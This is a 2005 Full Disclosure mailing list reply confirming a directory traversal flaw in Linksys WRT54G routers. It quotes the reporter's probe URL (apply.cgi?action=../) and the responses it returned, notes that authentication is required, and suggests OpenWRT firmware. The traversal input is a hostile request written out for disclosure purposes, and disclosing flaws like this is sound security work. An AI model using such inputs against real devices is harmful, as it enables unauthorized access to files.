Full Disclosure mailing list archives

Re: WRT54G directory trasversial vulnerability

From: Barrie Dempster <barrie () reboot-robot net>
Date: Fri, 14 Oct 2005 10:51:34 +0100

On Wed, 2005-10-12 at 16:36 -0400, Shell wrote:

I just found a vulnerability in Linksys WRT54G routers.

http://192.168.1.1/apply.cgi?action=../

It loads the page after action

http://192.168.1.1/apply.cgi?action=../ returns the setup page
http://192.168.1.1/apply.cgi?action=../blah returns that the file does not exist



Confirmed, however authentication is required. Still a vulnerability in
the system and worth patching though.

It's worth noting that there is alternative firmware available for this
device such as OpenWRT http://www.openwrt.org .

-- 
With Regards..
Barrie Dempster (zeedo) - Fortiter et Strenue

"He who hingeth aboot, geteth hee-haw" Victor - Still Game

blog:  http://reboot-robot.net
sites: http://www.bsrf.org.uk - http://www.security-forums.com
ca:    https://www.cacert.org/index.php?id=3

Attachment: smime.p7s
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

WRT54G directory trasversial vulnerability Shell (Oct 12)
- Re: WRT54G directory trasversial vulnerability Thierry Zoller (Oct 13)
- Re: WRT54G directory trasversial vulnerability Thierry Zoller (Oct 13)
- Re: WRT54G directory trasversial vulnerability Barrie Dempster (Oct 14)